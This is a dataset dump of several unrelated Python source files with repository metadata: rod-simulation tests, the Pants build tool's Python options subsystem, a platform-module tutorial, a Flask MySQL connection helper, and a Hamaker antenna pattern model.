def run_test7():
'''
Test 7: Falling string
'''
n = 20
h = 1.0/1024.0
rho = 0.05
height = 2.0
delta = 0.2
roda_xs = helper.create_string(np.array([-5,0,0]), np.array([5,0,0]), n)
rodb_xs = helper.create_string(np.array([delta,-5+delta,height]), np.array([delta, 5+delta, height]), n)
rods_xs = np.array([roda_xs, rodb_xs])
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.5
icond.beta = 0.05
icond.t = 0.0
icond.ccd_threshold = 2.0 / h
icond.constraint_tolerance = 1e-5 * n * 2 # mid-stiffness rods
icond.anchor_stiffness = 1e3 # maintain the anchor constrants
icond.sparse_anchor_indices = np.array([
[0, 0],
[0, n],
], dtype=np.int32)
icond.sparse_anchor_values = np.array([
rods_xs[0,0,:],
rods_xs[0,-1,:],
], dtype=np.float32)
icond.g = 9.8
icond.rho = rho
run_with_bc(n, h, rho, icond, '/tmp/tfccd7')
def run_test8():
'''
Test 8: Falling segment
Failure case: delta = -0.6
'''
n = 1
h = 1.0/1024.0
rho = 1.0
height = 2.0
delta = 0.6 #-1.6
roda_xs = helper.create_string(np.array([-1+delta,0,0]), np.array([1 + delta,0,0]), n)
rodb_xs = helper.create_string(np.array([0,-1,height]), np.array([0,1,height]), n)
rods_xs = np.array([roda_xs, rodb_xs])
# print(rods_xs)
roda_thetas = np.zeros(shape=[n], dtype=np.float32)
rodb_thetas = np.zeros(shape=[n], dtype=np.float32)
rods_thetas = np.array([roda_thetas, rodb_thetas])
roda_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rodb_xdots = np.zeros(shape=[n+1,3], dtype=np.float32)
rods_xdots = np.array([roda_xdots, rodb_xdots])
initd1 = np.array([
[0,1,0],
[1,0,0],
])
icond = helper.create_BCRodS(xs=rods_xs,
xdots=rods_xdots,
thetas=rods_thetas,
omegas=rods_thetas,
initd1=initd1
)
icond.alpha = 0.125
icond.beta = 0.05
icond.t = 0.0
icond.ccd_threshold = 200.0 / h
icond.sparse_anchor_indices = np.array([
[0, 0],
[0, n],
], dtype=np.int32)
icond.sparse_anchor_values = np.array([
rods_xs[0,0,:],
rods_xs[0,-1,:],
], dtype=np.float32)
icond.g = 9.8
run_with_bc(n, h, rho, icond, '/tmp/tfccd8')
def run():
run_test0()
run_test1()
run_test2()
run_test3()
run_test4()
run_test5()
run_test6()
run_test7()
run_test8()
if __name__ == '__main__':
run()
| [
"xinyazhang@utexas.edu"
] | xinyazhang@utexas.edu |
7c3cc5ad73fd374240d67326c992a1b4bc7e8aff | 5db0fab37c2b8a618d85d3b60fab9f806c416474 | /src/python/pants/backend/python/subsystems/setup.py | daee3e34c727448755ce462c7cbf1ebc5eaee574 | [
"Apache-2.0"
] | permissive | pantsbuild/pants | 4988d1ac5474ec95f94ce2218aeb759401e4b011 | 98cbda8545f0d58c586ed2daa76fefd729d5e0d5 | refs/heads/main | 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 | Apache-2.0 | 2023-09-14T19:33:33 | 2012-12-17T17:39:04 | Python | UTF-8 | Python | false | false | 28,266 | py | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import enum
import logging
import os
from typing import Iterable, List, Optional, TypeVar, cast
from packaging.utils import canonicalize_name
from pants.core.goals.generate_lockfiles import UnrecognizedResolveNamesError
from pants.option.errors import OptionsError
from pants.option.option_types import (
BoolOption,
DictOption,
EnumOption,
FileOption,
StrListOption,
StrOption,
)
from pants.option.subsystem import Subsystem
from pants.util.docutil import bin_name, doc_url
from pants.util.memo import memoized_method, memoized_property
from pants.util.strutil import softwrap
logger = logging.getLogger(__name__)
@enum.unique
class InvalidLockfileBehavior(enum.Enum):
error = "error"
ignore = "ignore"
warn = "warn"
@enum.unique
class LockfileGenerator(enum.Enum):
PEX = "pex"
POETRY = "poetry"
RESOLVE_OPTION_KEY__DEFAULT = "__default__"
_T = TypeVar("_T")
class PythonSetup(Subsystem):
options_scope = "python"
help = "Options for Pants's Python backend."
default_interpreter_universe = [
"2.7",
"3.5",
"3.6",
"3.7",
"3.8",
"3.9",
"3.10",
"3.11",
"3.12",
]
_interpreter_constraints = StrListOption(
default=None,
help=softwrap(
"""
The Python interpreters your codebase is compatible with.
These constraints are used as the default value for the `interpreter_constraints`
field of Python targets.
Specify with requirement syntax, e.g. `'CPython>=2.7,<3'` (A CPython interpreter with
version >=2.7 AND version <3) or `'PyPy'` (A pypy interpreter of any version). Multiple
constraint strings will be ORed together.
"""
),
advanced=True,
metavar="<requirement>",
)
@memoized_property
def interpreter_constraints(self) -> tuple[str, ...]:
if not self._interpreter_constraints:
# TODO: This is a hacky affordance for Pants's own tests, dozens of which were
# written when Pants provided default ICs, and implicitly rely on that assumption.
# We'll probably want to find and modify all those tests to set an explicit IC, but
# that will take time.
if "PYTEST_CURRENT_TEST" in os.environ:
return (">=3.7,<4",)
raise OptionsError(
softwrap(
f"""\
You must explicitly specify the default Python interpreter versions your code
is intended to run against.
You specify these interpreter constraints using the `interpreter_constraints`
option in the `[python]` section of pants.toml.
We recommend constraining to a single interpreter minor version if you can,
e.g., `interpreter_constraints = ['==3.11.*']`, or at least a small number of
interpreter minor versions, e.g., `interpreter_constraints = ['>=3.10,<3.12']`.
Individual targets can override these default interpreter constraints,
if different parts of your codebase run against different python interpreter
versions in a single repo.
See {doc_url("python-interpreter-compatibility")} for details.
"""
),
)
return self._interpreter_constraints
interpreter_versions_universe = StrListOption(
default=default_interpreter_universe,
help=softwrap(
f"""
All known Python major/minor interpreter versions that may be used by either
your code or tools used by your code.
This is used by Pants to robustly handle interpreter constraints, such as knowing
when generating lockfiles which Python versions to check if your code is using.
This does not control which interpreter your code will use. Instead, to set your
interpreter constraints, update `[python].interpreter_constraints`, the
`interpreter_constraints` field, and relevant tool options like
`[isort].interpreter_constraints` to tell Pants which interpreters your code
actually uses. See {doc_url('python-interpreter-compatibility')}.
All elements must be the minor and major Python version, e.g. `'2.7'` or `'3.10'`. Do
not include the patch version.
"""
),
advanced=True,
)
enable_resolves = BoolOption(
default=False,
help=softwrap(
"""
Set to true to enable lockfiles for user code. See `[python].resolves` for an
explanation of this feature.
This option is mutually exclusive with `[python].requirement_constraints`. We strongly
recommend using this option because it:
1. Uses `--hash` to validate that all downloaded files are expected, which reduces\
the risk of supply chain attacks.
2. Enforces that all transitive dependencies are in the lockfile, whereas\
constraints allow you to leave off dependencies. This ensures your build is more\
stable and reduces the risk of supply chain attacks.
3. Allows you to have multiple lockfiles in your repository.
"""
),
advanced=True,
mutually_exclusive_group="lockfile",
)
resolves = DictOption[str](
default={"python-default": "3rdparty/python/default.lock"},
help=softwrap(
f"""
A mapping of logical names to lockfile paths used in your project.
Many organizations only need a single resolve for their whole project, which is
a good default and often the simplest thing to do. However, you may need multiple
resolves, such as if you use two conflicting versions of a requirement in
your repository.
If you only need a single resolve, run `{bin_name()} generate-lockfiles` to
generate the lockfile.
If you need multiple resolves:
1. Via this option, define multiple resolve names and their lockfile paths.\
The names should be meaningful to your repository, such as `data-science` or\
`pants-plugins`.
2. Set the default with `[python].default_resolve`.
3. Update your `python_requirement` targets with the `resolve` field to declare which\
resolve they should be available in. They default to `[python].default_resolve`,\
so you only need to update targets that you want in non-default resolves.\
(Often you'll set this via the `python_requirements` or `poetry_requirements`\
target generators)
4. Run `{bin_name()} generate-lockfiles` to generate the lockfiles. If the results\
aren't what you'd expect, adjust the prior step.
5. Update any targets like `python_source` / `python_sources`,\
`python_test` / `python_tests`, and `pex_binary` which need to set a non-default\
resolve with the `resolve` field.
If a target can work with multiple resolves, you can either use the `parametrize`
mechanism or manually create a distinct target per resolve. See {doc_url("targets")}
for information about `parametrize`.
For example:
python_sources(
resolve=parametrize("data-science", "web-app"),
)
You can name the lockfile paths what you would like; Pants does not expect a
certain file extension or location.
Only applies if `[python].enable_resolves` is true.
"""
),
advanced=True,
)
default_resolve = StrOption(
default="python-default",
help=softwrap(
"""
The default value used for the `resolve` field.
The name must be defined as a resolve in `[python].resolves`.
"""
),
advanced=True,
)
default_run_goal_use_sandbox = BoolOption(
default=True,
help=softwrap(
"""
The default value used for the `run_goal_use_sandbox` field of Python targets. See the
relevant field for more details.
"""
),
)
pip_version = StrOption(
default="23.1.2",
help=softwrap(
f"""
Use this version of Pip for resolving requirements and generating lockfiles.
The value used here must be one of the Pip versions supported by the underlying PEX
version. See {doc_url("pex")} for details.
N.B.: The `latest` value selects the latest of the choices listed by PEX which is not
necessarily the latest Pip version released on PyPI.
"""
),
advanced=True,
)
_resolves_to_interpreter_constraints = DictOption["list[str]"](
help=softwrap(
"""
Override the interpreter constraints to use when generating a resolve's lockfile
with the `generate-lockfiles` goal.
By default, each resolve from `[python].resolves` will use your
global interpreter constraints set in `[python].interpreter_constraints`. With
this option, you can override each resolve to use certain interpreter
constraints, such as `{'data-science': ['==3.8.*']}`.
Warning: this does NOT impact the interpreter constraints used by targets within the
resolve, which is instead set by the option `[python].interpreter_constraints` and the
`interpreter_constraints` field. It only impacts how the lockfile is generated.
Pants will validate that the interpreter constraints of your code using a
resolve are compatible with that resolve's own constraints. For example, if your
code is set to use `['==3.9.*']` via the `interpreter_constraints` field, but it's
using a resolve whose interpreter constraints are set to `['==3.7.*']`, then
Pants will error explaining the incompatibility.
The keys must be defined as resolves in `[python].resolves`.
"""
),
advanced=True,
)
_resolves_to_constraints_file = DictOption[str](
help=softwrap(
f"""
When generating a resolve's lockfile, use a constraints file to pin the version of
certain requirements. This is particularly useful to pin the versions of transitive
dependencies of your direct requirements.
See https://pip.pypa.io/en/stable/user_guide/#constraints-files for more information on
the format of constraint files and how constraints are applied in Pex and pip.
Expects a dictionary of resolve names from `[python].resolves` and Python tools (e.g.
`black` and `pytest`) to file paths for
constraints files. For example,
`{{'data-science': '3rdparty/data-science-constraints.txt'}}`.
If a resolve is not set in the dictionary, it will not use a constraints file.
You can use the key `{RESOLVE_OPTION_KEY__DEFAULT}` to set a default value for all
resolves.
"""
),
advanced=True,
)
_resolves_to_no_binary = DictOption[List[str]](
help=softwrap(
f"""
When generating a resolve's lockfile, do not use binary packages (i.e. wheels) for
these 3rdparty project names.
Expects a dictionary of resolve names from `[python].resolves` and Python tools (e.g.
`black` and `pytest`) to lists of project names. For example,
`{{'data-science': ['requests', 'numpy']}}`. If a resolve is not set in the dictionary,
it will have no restrictions on binary packages.
You can use the key `{RESOLVE_OPTION_KEY__DEFAULT}` to set a default value for all
resolves.
For each resolve, you can also use the value `:all:` to disable all binary packages:
`{{'data-science': [':all:']}}`.
Note that some packages are tricky to compile and may fail to install when this option
is used on them. See https://pip.pypa.io/en/stable/cli/pip_install/#install-no-binary
for details.
"""
),
advanced=True,
)
_resolves_to_only_binary = DictOption[List[str]](
help=softwrap(
f"""
When generating a resolve's lockfile, do not use source packages (i.e. sdists) for
these 3rdparty project names, e.g `['django', 'requests']`.
Expects a dictionary of resolve names from `[python].resolves` and Python tools (e.g.
`black` and `pytest`) to lists of project names. For example,
`{{'data-science': ['requests', 'numpy']}}`. If a resolve is not set in the dictionary,
it will have no restrictions on source packages.
You can use the key `{RESOLVE_OPTION_KEY__DEFAULT}` to set a default value for all
resolves.
For each resolve you can use the value `:all:` to disable all source packages:
`{{'data-science': [':all:']}}`.
Packages without binary distributions will fail to install when this option is used on
them. See https://pip.pypa.io/en/stable/cli/pip_install/#install-only-binary for
details.
"""
),
advanced=True,
)
invalid_lockfile_behavior = EnumOption(
default=InvalidLockfileBehavior.error,
help=softwrap(
"""
The behavior when a lockfile has requirements or interpreter constraints that are
not compatible with what the current build is using.
We recommend keeping the default of `error` for CI builds.
Note that `warn` will still expect a Pants lockfile header, it only won't error if
the lockfile is stale and should be regenerated.
Use `ignore` to avoid needing a lockfile header at all, e.g. if you are manually
managing lockfiles rather than using the `generate-lockfiles` goal.
"""
),
advanced=True,
)
resolves_generate_lockfiles = BoolOption(
default=True,
help=softwrap(
"""
If False, Pants will not attempt to generate lockfiles for `[python].resolves` when
running the `generate-lockfiles` goal.
This is intended to allow you to manually generate lockfiles for your own code,
rather than using Pex lockfiles. For example, when adopting Pants in a project already
using Poetry, you can use `poetry export --dev` to create a requirements.txt-style
lockfile understood by Pants, then point `[python].resolves` to the file.
If you set this to False, Pants will not attempt to validate the metadata headers
for your user lockfiles. This is useful so that you can keep
`[python].invalid_lockfile_behavior` to `error` or `warn` if you'd like so that tool
lockfiles continue to be validated, while user lockfiles are skipped.
Warning: it will likely be slower to install manually generated user lockfiles than Pex
ones because Pants cannot as efficiently extract the subset of requirements used for a
particular task. See the option `[python].run_against_entire_lockfile`.
"""
),
advanced=True,
)
run_against_entire_lockfile = BoolOption(
default=False,
help=softwrap(
"""
If enabled, when running binaries, tests, and repls, Pants will use the entire
lockfile file instead of just the relevant subset.
If you are using Pex lockfiles, we generally do not recommend this. You will already
get similar performance benefits to this option, without the downsides.
Otherwise, this option can improve performance and reduce cache size.
But it has two consequences:
1) All cached test results will be invalidated if any requirement in the lockfile
changes, rather than just those that depend on the changed requirement.
2) Requirements unneeded by a test/run/repl will be present on the sys.path, which
might in rare cases cause their behavior to change.
This option does not affect packaging deployable artifacts, such as
PEX files, wheels and cloud functions, which will still use just the exact
subset of requirements needed.
"""
),
advanced=True,
)
__constraints_deprecation_msg = softwrap(
f"""
We encourage instead migrating to `[python].enable_resolves` and `[python].resolves`,
which is an improvement over this option. The `[python].resolves` feature ensures that
your lockfiles are fully comprehensive, i.e. include all transitive dependencies;
uses hashes for better supply chain security; and supports advanced features like VCS
and local requirements, along with options `[python].resolves_to_only_binary`.
To migrate, stop setting `[python].requirement_constraints` and
`[python].resolve_all_constraints`, and instead set `[python].enable_resolves` to
`true`. Then, run `{bin_name()} generate-lockfiles`.
"""
)
requirement_constraints = FileOption(
default=None,
help=softwrap(
"""
When resolving third-party requirements for your own code (vs. tools you run),
use this constraints file to determine which versions to use.
Mutually exclusive with `[python].enable_resolves`, which we generally recommend as an
improvement over constraints file.
See https://pip.pypa.io/en/stable/user_guide/#constraints-files for more
information on the format of constraint files and how constraints are applied in
Pex and pip.
This only applies when resolving user requirements, rather than tools you run
like Black and Pytest. To constrain tools, set `[tool].lockfile`, e.g.
`[black].lockfile`.
"""
),
advanced=True,
mutually_exclusive_group="lockfile",
removal_version="3.0.0.dev0",
removal_hint=__constraints_deprecation_msg,
)
_resolve_all_constraints = BoolOption(
default=True,
help=softwrap(
"""
(Only relevant when using `[python].requirement_constraints.`) If enabled, when
resolving requirements, Pants will first resolve your entire
constraints file as a single global resolve. Then, if the code uses a subset of
your constraints file, Pants will extract the relevant requirements from that
global resolve so that only what's actually needed gets used. If disabled, Pants
will not use a global resolve and will resolve each subset of your requirements
independently.
Usually this option should be enabled because it can result in far fewer resolves.
"""
),
advanced=True,
removal_version="3.0.0.dev0",
removal_hint=__constraints_deprecation_msg,
)
resolver_manylinux = StrOption(
default="manylinux2014",
help=softwrap(
"""
Whether to allow resolution of manylinux wheels when resolving requirements for
foreign linux platforms. The value should be a manylinux platform upper bound,
e.g. `'manylinux2010'`, or else the string `'no'` to disallow.
"""
),
advanced=True,
)
tailor_source_targets = BoolOption(
default=True,
help=softwrap(
"""
If true, add `python_sources`, `python_tests`, and `python_test_utils` targets with
the `tailor` goal."""
),
advanced=True,
)
tailor_ignore_empty_init_files = BoolOption(
"--tailor-ignore-empty-init-files",
default=True,
help=softwrap(
"""
If true, don't add `python_sources` targets for `__init__.py` files that are both empty
and where there are no other Python files in the directory.
Empty and solitary `__init__.py` files usually exist as import scaffolding rather than
true library code, so it can be noisy to add BUILD files.
Even if this option is set to true, Pants will still ensure the empty `__init__.py`
files are included in the sandbox when running processes.
If you set to false, you may also want to set `[python-infer].init_files = "always"`.
"""
),
advanced=True,
)
tailor_requirements_targets = BoolOption(
default=True,
help=softwrap(
"""
If true, add `python_requirements`, `poetry_requirements`, and `pipenv_requirements`
target generators with the `tailor` goal.
`python_requirements` targets are added for any file that matches the pattern
`*requirements*.txt`. You will need to manually add `python_requirements` for different
file names like `reqs.txt`.
`poetry_requirements` targets are added for `pyproject.toml` files with `[tool.poetry`
in them.
"""
),
advanced=True,
)
tailor_pex_binary_targets = BoolOption(
default=False,
help=softwrap(
"""
If true, add `pex_binary` targets for Python files named `__main__.py` or with a
`__main__` clause with the `tailor` goal.
"""
),
advanced=True,
)
tailor_py_typed_targets = BoolOption(
default=True,
help=softwrap(
"""
If true, add `resource` targets for marker files named `py.typed` with the `tailor` goal.
"""
),
advanced=True,
)
macos_big_sur_compatibility = BoolOption(
default=False,
help=softwrap(
"""
If set, and if running on macOS Big Sur, use `macosx_10_16` as the platform
when building wheels. Otherwise, the default of `macosx_11_0` will be used.
This may be required for `pip` to be able to install the resulting distribution
on Big Sur.
"""
),
advanced=True,
)
enable_lockfile_targets = BoolOption(
default=True,
help=softwrap(
"""
Create targets for all Python lockfiles defined in `[python].resolves`.
The lockfile targets will then be used as dependencies to the `python_requirement`
targets that use them, invalidating source targets per resolve when the lockfile
changes.
If another targets address is in conflict with the created lockfile target, it will
shadow the lockfile target and it will not be available as a dependency for any
`python_requirement` targets.
"""
),
advanced=True,
)
repl_history = BoolOption(
default=True,
help="Whether to use the standard Python command history file when running a repl.",
)
@property
def enable_synthetic_lockfiles(self) -> bool:
return self.enable_resolves and self.enable_lockfile_targets
@memoized_property
def resolves_to_interpreter_constraints(self) -> dict[str, tuple[str, ...]]:
result = {}
unrecognized_resolves = []
for resolve, ics in self._resolves_to_interpreter_constraints.items():
if resolve not in self.resolves:
unrecognized_resolves.append(resolve)
result[resolve] = tuple(ics)
if unrecognized_resolves:
raise UnrecognizedResolveNamesError(
unrecognized_resolves,
self.resolves.keys(),
description_of_origin="the option `[python].resolves_to_interpreter_constraints`",
)
return result
def _resolves_to_option_helper(
self,
option_value: dict[str, _T],
option_name: str,
) -> dict[str, _T]:
all_valid_resolves = set(self.resolves)
unrecognized_resolves = set(option_value.keys()) - {
RESOLVE_OPTION_KEY__DEFAULT,
*all_valid_resolves,
}
if unrecognized_resolves:
raise UnrecognizedResolveNamesError(
sorted(unrecognized_resolves),
{*all_valid_resolves, RESOLVE_OPTION_KEY__DEFAULT},
description_of_origin=f"the option `[python].{option_name}`",
)
default_val = option_value.get(RESOLVE_OPTION_KEY__DEFAULT)
if not default_val:
return option_value
return {resolve: option_value.get(resolve, default_val) for resolve in all_valid_resolves}
@memoized_method
def resolves_to_constraints_file(self) -> dict[str, str]:
return self._resolves_to_option_helper(
self._resolves_to_constraints_file,
"resolves_to_constraints_file",
)
@memoized_method
def resolves_to_no_binary(self) -> dict[str, list[str]]:
return {
resolve: [canonicalize_name(v) for v in vals]
for resolve, vals in self._resolves_to_option_helper(
self._resolves_to_no_binary,
"resolves_to_no_binary",
).items()
}
@memoized_method
def resolves_to_only_binary(self) -> dict[str, list[str]]:
return {
resolve: sorted([canonicalize_name(v) for v in vals])
for resolve, vals in self._resolves_to_option_helper(
self._resolves_to_only_binary,
"resolves_to_only_binary",
).items()
}
@property
def manylinux(self) -> str | None:
manylinux = cast(Optional[str], self.resolver_manylinux)
if manylinux is None or manylinux.lower() in ("false", "no", "none"):
return None
return manylinux
@property
def resolve_all_constraints(self) -> bool:
if (
self._resolve_all_constraints
and not self.options.is_default("resolve_all_constraints")
and not self.requirement_constraints
):
raise ValueError(
softwrap(
"""
`[python].resolve_all_constraints` is enabled, so
`[python].requirement_constraints` must also be set.
"""
)
)
return self._resolve_all_constraints
@property
def scratch_dir(self):
return os.path.join(self.options.pants_workdir, *self.options_scope.split("."))
def compatibility_or_constraints(self, compatibility: Iterable[str] | None) -> tuple[str, ...]:
"""Return either the given `compatibility` field or the global interpreter constraints.
If interpreter constraints are supplied by the CLI flag, return those only.
"""
if self.options.is_flagged("interpreter_constraints"):
return self.interpreter_constraints
return tuple(compatibility or self.interpreter_constraints)
def compatibilities_or_constraints(
self, compatibilities: Iterable[Iterable[str] | None]
) -> tuple[str, ...]:
return tuple(
constraint
for compatibility in compatibilities
for constraint in self.compatibility_or_constraints(compatibility)
)
| [
"noreply@github.com"
] | pantsbuild.noreply@github.com |
7e7b13cc713a73b93b9922fa4890545534bec49f | 149e9e52304a970ffb256f290fce5f614c9e20c4 | /Python Programming language/DataCampPractice/Corso_CISCO_netacad/modules/platform_module/m9_platform.py | 418ca4b294f6305bd778bfbbc88fc1fb4623c30e | [] | no_license | Pasquale-Silv/Improving_Python | 7451e0c423d73a91fa572d44d3e4133b0b4f5c98 | 96b605879810a9ab6c6459913bd366b936e603e4 | refs/heads/master | 2023-06-03T15:00:21.554783 | 2021-06-22T15:26:28 | 2021-06-22T15:26:28 | 351,806,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | """
But sometimes you want to know more - for example, the name of the OS which hosts Python,
and some characteristics describing the hardware that hosts the OS.
There is a module providing some means to allow you to know where you are and what components work for you.
The module is named
platform
We'll show you some of the functions it provides to you.
The platform module lets you access the underlying platform's data, i.e.,
hardware, operating system, and interpreter version information.
There is a function that can show you all the underlying layers in one glance, named platform, too.
It just returns a string describing the environment; thus,
its output is rather addressed to humans than to automated processing (you'll see it soon).
This is how you can invoke it:
platform(aliased = False, terse = False)
"""
from platform import platform
print(platform())
print(platform(1))
print(platform(0, 1))
print(platform(0, 1))
| [
"55320885+Pasquale-Silv@users.noreply.github.com"
] | 55320885+Pasquale-Silv@users.noreply.github.com |
b4eadce6676c593ff4b4b8f33c4ab61fae97d601 | 77b16dcd465b497c22cf3c096fa5c7d887d9b0c2 | /Quintana_Jerrod/Assignments/f+sql_projects/login_registration/mysqlconnection.py | 4c155f5e9f6da54e3176b393d8fb413e17530147 | [
"MIT"
] | permissive | curest0x1021/Python-Django-Web | a7cf8a45e0b924ce23791c18f6a6fb3732c36322 | 6264bc4c90ef1432ba0902c76b567cf3caaae221 | refs/heads/master | 2020-04-26T17:14:20.277967 | 2016-10-18T21:54:39 | 2016-10-18T21:54:39 | 173,706,702 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,250 | py | """ import the necessary modules """
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import text
# Create a class that will give us an object that we can use to connect to a database
class MySQLConnection(object):
def __init__(self, app, db):
config = {
'host': 'localhost',
'database': 'login_registration', # we got db as an argument
# my note: The database name above is the only db from the original copy of this document that changes
'user': 'root',
'password': '',
# password is blank because I never set it
'port': '3306' # change the port to match the port your SQL server is running on
}
# this will use the above values to generate the path to connect to your sql database
DATABASE_URI = "mysql://{}:{}@127.0.0.1:{}/{}".format(config['user'], config['password'], config['port'], config['database'])
app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# establish the connection to database
self.db = SQLAlchemy(app)
# this is the method we will use to query the database
def query_db(self, query, data=None):
result = self.db.session.execute(text(query), data)
if query[0:6].lower() == 'select':
# if the query was a select
# convert the result to a list of dictionaries
list_result = [dict(r) for r in result]
# return the results as a list of dictionaries
return list_result
elif query[0:6].lower() == 'insert':
# if the query was an insert, return the id of the
# commit changes
self.db.session.commit()
# row that was inserted
return result.lastrowid
else:
# if the query was an update or delete, return nothing and commit changes
self.db.session.commit()
# This is the module method to be called by the user in server.py. Make sure to provide the db name!
# My note: best I can tell, these two db's don't change, only the middle one
def MySQLConnector(app, db):
return MySQLConnection(app, db)
| [
"43941751+curest0x1021@users.noreply.github.com"
] | 43941751+curest0x1021@users.noreply.github.com |
0fbd804353c409e267bd017d27c00640523191a2 | 1b787489aab83b2e06a8f658ee8e01a10eb01998 | /antpat/reps/hamaker.py | f4272ea25cf8388cb1ffd0520e9dc8142dc481d5 | [
"ISC"
] | permissive | daydreamer2023/AntPat | 7edd471bd1e0997eb5befa029120ba13b861f106 | 6dc416a1593346421337400f880e7159a07447f6 | refs/heads/master | 2022-01-22T17:52:39.300557 | 2019-08-15T08:41:24 | 2019-08-15T08:41:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,368 | py | #!/usr/bin/python
"""Hamaker's analytic antenna pattern model."""
#TobiaC 2015-11-29 (2015-07-31)
import sys
#sys.path.append('/home/tobia/projects/BeamFormica/AntPatter/')
import math
import cmath
import scipy.special
import numpy
from antpat import dualpolelem
from antpat.reps.sphgridfun import tvecfun, pntsonsphere
import matplotlib.pyplot as plt
HA_LBAfile_default = ''
class HamakerPolarimeter(object):
"""This is the Hamaker polarimeter model class."""
nr_pols = 2 #Number of polarization channels
def __init__(self, artsdata):
"""Objects are created based on a Arts coefficient C++ header
file. There is current one default set for the HBA and one for
LBA."""
self.coefs = artsdata['coefs']
self.HAcoefversion = artsdata['HAcoefversion']
self.HAcoefband = artsdata['HAcoefband']
self.HAcoefnrelem = artsdata['HAcoefnrelem']
self.freq_center = artsdata['freq_center']
self.freq_range = artsdata['freq_range']
self.channels = artsdata['channels']
self.nr_bands=len(self.coefs)
self.freqintervs = (self.freq_center-self.freq_range,
self.freq_center+self.freq_range)
def getfreqs(self):
"""Returns nominals channel center frequencies"""
return self.channels
def getJonesAlong(self, freqvals, theta_phi):
"""Compute Jones matrix for given frequencies and directions.
Input is list of frequencies in Hz and a list of theta,phi pairs;
and the output is Jones[freq, dir_th, dir_ph, polchan, comp]."""
mask_horizon = True
(theta, phi) = theta_phi
theta = numpy.array(theta)
phi = numpy.array(phi)
freqvals = numpy.array(freqvals)
(k_ord, TH_ord, FR_ord, nr_pol) = self.coefs.shape
freqn = (freqvals-self.freq_center)/self.freq_range
if len(freqvals) > 1:
frqXdrn_shp = freqvals.shape+theta.shape
else :
frqXdrn_shp = theta.shape
response = numpy.zeros(frqXdrn_shp+(2, 2), dtype=complex)
for ki in range(k_ord):
P = numpy.zeros((nr_pol,)+frqXdrn_shp, dtype=complex)
for THi in range(TH_ord):
for FRi in range(FR_ord):
fac = numpy.multiply.outer(freqn**FRi, theta**THi).squeeze()
P[0,...] += self.coefs[ki,THi,FRi,0]*fac
P[1,...] += self.coefs[ki,THi,FRi,1]*fac
ang = (-1)**ki*(2*ki+1)*phi
response[...,0,0] += +numpy.cos(ang)*P[0,...]
response[...,0,1] += -numpy.sin(ang)*P[1,...]
response[...,1,0] += +numpy.sin(ang)*P[0,...]
response[...,1,1] += +numpy.cos(ang)*P[1,...]
#numpy.array([[math.cos(ang)*P[0],-math.sin(ang)*P[1]],
# [math.sin(ang)*P[0], math.cos(ang)*P[1]]])
#Mask beam below horizon
if mask_horizon:
mh = numpy.ones(frqXdrn_shp+(1,1))
mh[...,numpy.where(theta>numpy.pi/2),0,0]=0.
response=mh*response
return response
def plotElemPat(artsdata, frequency = 55.0e6):
"""Plots the HA antenna pattern over the entire Hemisphere."""
THETA, PHI = pntsonsphere.ZenHemisphGrid() #theta=0.2rad for zenith anomaly
hp = HamakerPolarimeter(artsdata)
jones=hp.getJonesAlong([frequency], (THETA, PHI) )
EsTh = numpy.squeeze(jones[...,0,0])
EsPh = numpy.squeeze(jones[...,0,1])
tvecfun.plotvfonsph(THETA, PHI, EsTh, EsPh, freq=frequency, vcoord='Ludwig3')
EsTh = numpy.squeeze(jones[...,1,0])
EsPh = numpy.squeeze(jones[...,1,1])
tvecfun.plotvfonsph(THETA, PHI, EsTh, EsPh, freq=frequency, vcoord='Ludwig3')
def showAnomaly():
"""Demostrates the anomaly of the Hamaker-Arts model close to zenith."""
frequency = 225e6
nrPnts = 200
timeAng = 0.5
timeAngs = numpy.linspace(-timeAng, timeAng, nrPnts)/2.0
theta0 = 0.5
thetas, phis = pntsonsphere.getTrack(theta0, 0*math.pi/4, theta0-0.001, timeAngs)
hp = HamakerPolarimeter(HA_LBAfile_default)
#jones = hp.getJonesAlong([frequency], (phis+1*5*math.pi/4, math.pi/2-thetas))
jones = hp.getJonesAlong([frequency], (phis+1*5*math.pi/4, thetas))
EsTh = numpy.squeeze(jones[...,0,0])
EsPh = numpy.squeeze(jones[...,0,1])
plt.subplot(2,1,1)
plt.plot(phis/math.pi*180, 90-thetas/math.pi*180, '*')
plt.xlabel('Azimuth [deg]')
plt.ylabel('Elevation [deg]')
plt.subplot(2,1,2)
plt.plot(timeAngs*60, numpy.abs(EsTh))
plt.xlabel('Transit time [min]')
plt.ylabel('Gain [rel.]')
plt.show()
def getJones(freq, az, el):
"""Print the Jones matrix of the HA model for a frequency and direction."""
hp = HamakerPolarimeter(HA_LBAfile_default)
jones=hp.getJonesAlong([10.e6], (0.1, 0.2))
print "Jones:"
print jones
print "J.J^H:"
print numpy.dot(jones, jones.conj().transpose()).real
IXRJ = dualpolelem.getIXRJ(jones)
print "IXRJ:", 10*numpy.log10(IXRJ),"[dB]"
def _getargs():
freq = float(sys.argv[1])
az = float(sys.argv[2])
el = float(sys.argv[3])
return freq, az, el
if __name__ == "__main__":
#plotElemPat(30e6)
showAnomaly()
#HBAmod = HamakerPolarimeter(HA_HBAfile_default)
#jones = HBAmod.getJonesAlong([150e6, 160e6, 170e6], ( [0.1,0.1], [0.3, 0.4]) )
#print jones
| [
"tobia@chalmers.se"
] | tobia@chalmers.se |
